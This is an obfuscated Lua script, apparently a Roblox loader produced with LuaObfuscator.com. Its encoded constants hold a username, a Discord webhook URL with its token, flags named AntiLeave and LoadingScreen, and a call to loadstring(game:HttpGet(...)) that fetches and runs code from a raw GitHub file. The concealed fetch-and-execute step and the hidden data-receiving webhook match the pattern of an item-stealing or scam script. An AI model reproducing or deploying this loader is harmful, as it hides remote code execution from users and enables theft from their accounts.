--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-(878 -(282 + 595)))))%((5 -3)^(((v33-(1 -(1637 -(1523 + 114)))) -(v32-(2 -1))) + (620 -(499 + 56 + 64)))) ;return v70-(v70%(932 -(857 + 12 + 62))) ;else local v71=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v71 + v71))>=v71) and 1) or ((0 -0) + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1068 -(16 + 52 + 997)) );v19=v19 + (1274 -(226 + 1044)) ;return (v37 * (73054774 -56277558)) + (v36 * (65653 -(32 + (1042 -(892 + 65))))) + (v35 * (251 + 5)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v38==(1993 -(582 + 1408))) then v45=nil;v46=nil;v38=13 -9 ;end if (1~=v38) then else v41=nil;v42=nil;v38=2;end if (v38~=(2 -0)) then else v43=nil;v44=nil;v38=3;end if ((0 -0)~=v38) then else v39=0;v40=nil;v38=1;end if (v38~=4) then else v47=nil;while true do if (v39~=(1827 -(1195 + 629))) then else v46=nil;v47=nil;v39=4;end if (v39==(5 -1)) then while true do if (v40~=(243 -(187 + 54))) then else local v102=780 -(162 + 618) ;while true do if (v102==(1 + 0)) then v40=3;break;end if (v102~=(0 + 0)) then else v45=nil;v46=nil;v102=1;end end end if (v40==0) then local v103=0;local v104;while true do if (v103~=0) then else v104=0 -0 ;while true do if (v104==(0 -0)) then local v110=0;while true do if (0~=v110) then else v41=0 + 0 ;v42=nil;v110=1637 -(1373 + 263) ;end if (v110==(1001 -(451 + 549))) then v104=1;break;end end end if (v104==(1 + 0)) then v40=1 -0 ;break;end end break;end end end if (v40~=(1 -0)) then else local v105=1384 -(746 + 638) ;local v106;while true do if (v105==0) then v106=0 + 0 ;while true do if (v106~=(0 -0)) then else v43=nil;v44=nil;v106=342 -(218 + 123) ;end if (v106~=1) then else v40=1583 -(1535 + 46) ;break;end end break;end end end if (v40~=(3 + 0)) then else v47=nil;while true do local v107=0;local v108;local v109;while true do if (v107~=1) then else while true do if (v108~=(0 + 0)) then else v109=0;while true do if (v109~=0) then else local v153=0;while true do if (v153~=(561 -(306 + 254))) then else v109=1;break;end if (v153~=(0 + 0)) then else if (v41==(0 -0)) then local v166=1467 -(899 + 568) ;while true do if (v166~=(1 + 0)) then else v44={};v41=1;break;end if (v166==(0 -0)) then local v168=603 -(268 + 335) ;while true do if (1~=v168) then else v166=291 -(60 + 230) ;break;end if (v168==0) then v42={};v43={};v168=573 -(426 + 146) ;end end end end end if ((1 + 0)~=v41) then else local v167=0;while true do if (v167~=(1456 -(282 + 1174))) then else local v169=0;while true do if (v169~=(812 -(569 + 242))) then else v167=2 -1 ;break;end if (v169~=(0 + 0)) then else v45={v42,v43,nil,v44};v46=v24();v169=1;end end end if (v167~=(1272 -(945 + 326))) then else v47={};v41=2;break;end end end v153=2 -1 ;end end end if (v109==(1 + 0)) then if (v41==2) then local v159=700 -(271 + 429) ;local v160;local v161;while true do if (v159~=(1 + 0)) then else while true do if (v160==0) then v161=0;while true do if (v161==(1500 -(1408 + 92))) then local v171=0;local v172;while true do if (v171~=(1086 -(461 + 625))) then else v172=0;while true do if (v172==(1288 -(993 + 295))) then for v181=1 + 0 ,v46 do local v182=1171 -(418 + 753) ;local v183;local v184;local v185;while true do if (v182~=(0 + 0)) then else v183=0;v184=nil;v182=1;end if ((1 + 0)==v182) then v185=nil;while true do if (v183==(0 + 0)) then local v194=0;while true do if (v194==(0 + 0)) then v184=v22();v185=nil;v194=530 -(406 + 123) ;end if (v194==(1770 -(1749 + 20))) then v183=1 + 0 ;break;end end end if (v183==(1323 -(1249 + 73))) then if (v184==1) then v185=v22()~=(0 + 0) ;elseif (v184==(1147 -(466 + 679))) then v185=v25();elseif (v184==3) then v185=v26();end v47[v181]=v185;break;end end break;end end end v45[6 -3 ]=v22();v172=1;end if ((2 -1)~=v172) then else v161=1901 -(106 + 1794) ;break;end end break;end end end if (v161==(1 + 0)) then for v174=1 + 0 ,v24() do local v175=0 -0 ;local v176;local v177;while true do if (v175~=(0 -0)) then else v176=114 -(4 + 110) ;v177=nil;v175=1;end if (v175==(585 -(57 + 527))) then while true do if (v176==(1427 -(41 + 1386))) then v177=v22();if (v21(v177,1,104 -(17 + 86) )~=(0 + 0)) then else local v186=0 -0 ;local v187;local v188;local v189;local v190;local v191;while true do if (v186==2) then v191=nil;while true do if (0~=v187) then else local v196=0;local v197;while true do if (v196~=0) then else v197=0 -0 ;while true do if (v197==0) then v188=166 -(122 + 44) ;v189=nil;v197=1 -0 ;end if (v197==(3 -2)) then v187=1;break;end end break;end end end if (1~=v187) then else v190=nil;v191=nil;v187=2 + 0 ;end if ((1 + 1)==v187) then while true do if (v188==(5 -2)) then if (v21(v190,3,68 -(30 + 35) )==(1 + 0)) then v191[1261 -(1043 + 214) ]=v47[v191[15 -11 ]];end v42[v174]=v191;break;end if ((1213 -(323 + 889))~=v188) then else local v199=0 -0 ;local v200;local v201;while true do if (v199~=(581 -(361 + 219))) then else while true do if (v200~=0) then else v201=320 -(53 + 267) ;while true do if (v201==0) then local v208=0 + 0 ;while true do if (0~=v208) then else v191={v23(),v23(),nil,nil};if (v189==0) then local v213=0 + 0 ;local v214;while true do if ((0 + 0)~=v213) then else v214=0;while true do if (v214~=(850 -(20 + 830))) then else v191[3 + 0 ]=v23();v191[4]=v23();break;end end break;end end elseif (v189==(127 -(116 + 10))) then v191[3]=v24();elseif (v189==2) then v191[1 + 2 ]=v24() -((740 -(542 + 196))^(34 -18)) ;elseif (v189==(1 + 2)) then local v219=0 + 0 ;local v220;local v221;while true do if (v219==(1 + 0)) then while true do if (v220~=0) then else v221=0 -0 ;while true do if (0==v221) then v191[7 -4 ]=v24() -((1553 -(1126 + 425))^16) ;v191[409 -(118 + 287) ]=v23();break;end end break;end end break;end if (v219==0) then v220=0 -0 ;v221=nil;v219=1;end end end v208=1;end if (v208~=1) then else v201=1122 -(118 + 1003) ;break;end end end if (v201==(2 -1)) then v188=379 -(142 + 235) ;break;end end break;end end break;end if (v199~=0) then else v200=0 -0 ;v201=nil;v199=1;end end end if ((1 + 1)~=v188) then else local v202=977 -(553 + 424) ;local v203;while true do if (v202==0) then v203=0 -0 ;while true do if (v203==(0 + 0)) then local v207=0;while true do if (v207==(1 + 0)) then v203=1;break;end if (v207~=(0 + 0)) then else if (v21(v190,1,1)~=1) then else v191[1 + 1 ]=v47[v191[2 + 0 ]];end if (v21(v190,2,4 -2 )~=(2 -1)) then else v191[6 -3 ]=v47[v191[3]];end v207=1 + 0 ;end end end if (v203==(4 -3)) then v188=756 -(239 + 514) ;break;end end break;end end end if (v188~=(0 + 0)) then else local v204=1329 -(797 + 532) ;while true do if (v204==0) then v189=v21(v177,2 + 0 ,2 + 1 );v190=v21(v177,4,6);v204=2 -1 ;end if (v204==1) then v188=1;break;end end end end break;end end break;end if (v186==0) then local v192=0;while true do if (v192==(1203 -(373 + 829))) then v186=732 -(476 + 255) ;break;end if (v192~=(1130 -(369 + 761))) then else v187=0;v188=nil;v192=1 + 0 ;end end end if (v186~=1) then else local v193=0;while true do if (v193==1) then v186=2;break;end if (v193~=0) then else v189=nil;v190=nil;v193=1 -0 ;end end end end end break;end end break;end end end v41=5 -2 ;break;end end break;end end break;end if (v159==(238 -(64 + 174))) then v160=0 + 0 ;v161=nil;v159=1 -0 ;end end end if ((339 -(144 + 192))==v41) then local v162=0;local v163;while true do if (v162~=0) then else v163=216 -(42 + 174) ;while true do if (v163~=(0 + 0)) then else local v170=0 + 0 ;while true do if (v170==0) then local v173=0;while true do if (v173~=(0 + 0)) then else for v178=1505 -(363 + 1141) ,v24() do v43[v178-1 ]=v29();end return v45;end end end end end end break;end end end break;end end break;end end break;end if (v107~=(1580 -(1183 + 397))) then else v108=0;v109=nil;v107=1;end end end break;end end break;end if (2==v39) then local v93=0;while true do if (v93==1) then v39=3;break;end if (v93==(0 -0)) then v44=nil;v45=nil;v93=1 + 0 ;end end end if (v39==1) then local v94=0 + 0 ;while true do if ((1976 -(1913 + 62))==v94) then v39=2;break;end if (v94==(0 + 0)) then v42=nil;v43=nil;v94=1;end end end if (v39~=(0 -0)) then else local v95=1933 -(565 + 1368) ;while true do if (v95~=0) then else v40=0;v41=nil;v95=3 -2 ;end if (v95~=1) then else v39=1;break;end end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=1;local v51=(v21(v49,1662 -(1477 + 184) ,27 -7 ) * ((2 + 0)^((1980 -(975 + 117)) -(564 + 292)))) + v48 ;local v52=v21(v49,21,53 -22 );local v53=((v21(v49,96 -64 )==(305 -(244 + 60))) and  -(1 + 0)) or ((2352 -(157 + 1718)) -(41 + 435)) ;if (v52==(1001 -(938 + 63))) then if (v51==0) then return v53 * (0 + 0) ;else v52=1126 -(936 + 154 + 35) ;v50=0 + 0 ;end elseif (v52==(3660 -(1565 + (170 -122)))) then return ((v51==0) and (v53 * ((1 + 0)/(1138 -(782 + 356))))) or (v53 * NaN) ;end return v8(v53,v52-((4410 -3120) -(176 + 91)) ) * (v50 + (v51/((4 -2)^((1093 -(697 + 321)) -23)))) ;end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -(2 -1) );v19=v19 + v54 ;local v56={};for v68=2 -1 , #v55 do v56[v68]=v2(v1(v3(v55,v68,v68)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (3 -1) ;return (v59 * (686 -430)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v72=v2(v0(v60,16));if v20 then local v76=v5(v72,v20);v20=nil;return v76;else return v72;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v77=v65;local v78=v66;local v79=v67;local v80=v28;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do local v92=0;while true do if (v92==0) then v89=v77[v81];v90=v89[1];v92=1;end if (v92==1) then if (v90<=9) then if (v90<=4) then if (v90<=1) then if (v90==0) then v87[v89[2]][v89[3]]=v89[4];else v63[v89[3]]=v87[v89[2]];end elseif (v90<=2) then v87[v89[2]]=v89[3];elseif (v90>3) then v87[v89[2]][v89[3]]=v89[4];else v87[v89[2]]=v63[v89[3]];end elseif (v90<=6) then if (v90>5) then local v117=v89[2];local v118=v87[v89[3]];v87[v117 + 1 ]=v118;v87[v117]=v118[v89[4]];else v87[v89[2]]();end elseif (v90<=7) then do return;end elseif (v90==8) then v87[v89[2]]=v89[3];else local v141=v89[2];v87[v141]=v87[v141](v13(v87,v141 + 1 ,v82));end elseif (v90<=14) then if (v90<=11) then if (v90==10) then v87[v89[2]]=v89[3]~=0 ;else do return;end end elseif (v90<=12) then v87[v89[2]]=v89[3]~=0 ;elseif (v90>13) then local v143=v89[2];local v144,v145=v80(v87[v143](v13(v87,v143 + 1 ,v89[3])));v82=(v145 + v143) -1 ;local v146=0;for v154=v143,v82 do v146=v146 + 1 ;v87[v154]=v144[v146];end else local v147=0;local v148;while true do if (v147==0) then v148=v89[2];v87[v148]=v87[v148](v13(v87,v148 + 1 ,v82));break;end end end elseif (v90<=16) then if (v90==15) then local v124=v89[2];local v125=v87[v89[3]];v87[v124 + 1 ]=v125;v87[v124]=v125[v89[4]];else local v129=v89[2];local v130,v131=v80(v87[v129](v13(v87,v129 + 1 ,v89[3])));v82=(v131 + v129) -1 ;local v132=0;for v133=v129,v82 do local v134=0;while true do if (v134==0) then v132=v132 + 1 ;v87[v133]=v130[v132];break;end end end end elseif (v90<=17) then v87[v89[2]]();elseif (v90==18) then v87[v89[2]]=v63[v89[3]];else v63[v89[3]]=v87[v89[2]];end v81=v81 + 1 ;break;end end end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0E3O0003083O00557365724E616D6503063O007A797079303903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31343632373238363937392O3436373935312F4F2O737A33536346316E31677039423341456F4C504935443832724A66634C4175564162324C535859425F792O624A2D5058334B445F68305A415A5F4A7A6C58757A734403093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747300153O0012083O00023O0012133O00013O0012083O00043O0012133O00033O0012083O00023O0012133O00053O002O123O00063O0030043O00070008002O123O00063O0030043O00090008002O123O00063O0030043O000A0008002O123O000B3O002O120001000C3O00200600010001000D0012080003000E4O000A000400014O0010000100044O000D5O00022O00053O000100012O00073O00017O00",v9(),...);
